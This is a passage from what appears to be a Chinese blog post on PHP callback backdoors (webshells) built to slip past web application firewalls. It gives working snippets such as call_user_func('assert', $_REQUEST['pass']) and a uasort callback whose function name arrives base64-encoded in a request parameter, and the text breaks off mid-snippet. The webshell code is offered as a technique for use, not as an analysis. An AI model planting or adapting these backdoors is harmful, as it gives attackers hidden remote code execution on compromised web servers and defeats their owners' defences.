bypass各种waf--php回调后门

文章目录

  • bypass各种waf--php回调后门
    • 一般过狗思路
    • 双参数回调后门
      • uasort
      • array_reduce
      • array_udiff
    • 单参数后门终极奥义
      • 这个是php全版本支持的,且不报不杀稳定执行:
      • 再来一个:
    • 参考链接:

bypass各种waf–php回调后门

一般过狗思路

call_user_func('assert', $_REQUEST['pass'])

bypass各种waf--php回调后门_第1张图片

双参数回调后门

uasort


$e=$_REQUEST['e'];
$arr=array('test', $_REQUEST['pass']);
uasort($arr, base64_decode($e));

bypass各种waf--php回调后门_第2张图片
由此方法引申出的姿势有:


$e=$_REQUEST['e'];
$arr=array('test'=>

你可能感兴趣的:(Web安全)